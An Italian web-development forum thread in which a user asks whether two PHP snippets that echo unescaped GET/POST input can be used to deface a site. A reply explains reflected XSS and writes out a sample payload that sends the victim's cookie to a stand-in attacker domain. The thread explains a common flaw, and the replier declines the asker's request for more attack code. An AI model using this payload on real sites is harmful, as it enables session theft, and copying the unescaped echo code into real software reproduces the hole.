Visualizzazione dei risultati da 1 a 7 su 7

Discussione: Codici vulnerabili

Codici vulnerabili

Salve sono nuovo nel forum e ho un paio di codici da farvi vedere e chiedervi se sono vulnerabili a tecniche di deface... se si come effettuare il deface con questi codici? grazie

codice:
    <?php

echo $_GET['url'];

?>

codice:
    <?php

echo $_POST['nome'];

?>

Utente di HTML.it L'avatar di badaze
    Tutto dipende da quello che segue quelle istruzioni. Di per se il codice che hai postato è abituale.
    Ridatemi i miei 1000 posts persi !!!!
    Non serve a nulla ottimizzare qualcosa che non funziona.
    Cerco il manuale dell'Olivetti LOGOS 80B - www.emmella.fr

Originariamente inviato da badaze
    Tutto dipende da quello che segue quelle istruzioni. Di per se il codice che hai postato è abituale.
    mmh non proprio.
    Stampare a video valori GET senza un controllo non è cosa buona.

Un attacco potrebbe essere quello di inserire javascript malizioso che browser meno recenti non riescono a bloccare. Es

codice:
    http://www.goodsite.com/?url=<script type="text/javascript">(new Image()).src="http://www.mydevilsite.it/?d="+document.cookie</script>
    Se tu, poco attento, capiti su questo link... il proprietario di mydevilsite.it ha i dati del tuo cookie, quindi probabilmente il tuo id di sessione che può rubarti allegramente.

Ovviamente tu devi essere poco furbo per aprire quel link, e devi inoltre avere un browser vecchiotto... ma di persone così ce ne sono a bizzeffe e la responsabilità è di chi ha questa vulnerabilità.

chumuku potresti dirmi uno javascript malizioso per quella variabile? olte a www.sito.com/paginavulnerabile.php?url=codice malizioso se lo hai xD

Originariamente inviato da Alby99
    chumuku potresti dirmi uno javascript malizioso per quella variabile? olte a www.sito.com/paginavulnerabile.php?url=codice malizioso se lo hai xD
    A parte che te l'ho già dato, ma se il tuo intento è quello di fare qualche dispetto... dovrai darti da fare da solo . Semplicemente perché non esiste il codice magico che funziona dappertutto e per qualsiasi cosa.

Utente di HTML.it L'avatar di badaze
    Originariamente inviato da chumkiu
    mmh non proprio.
    Stampare a video valori GET senza un controllo non è cosa buona.

.
    Hai ragione. Non so perche ma non ho visto gli echo. E' per questo che scrivevo che dipende dal codice che segue.
    Ridatemi i miei 1000 posts persi !!!!
    Non serve a nulla ottimizzare qualcosa che non funziona.
    Cerco il manuale dell'Olivetti LOGOS 80B - www.emmella.fr

chumkiu ma se io vado in quel sito mi ruba i cookie non ho capito che vuoi dirmi ._.

Permessi di invio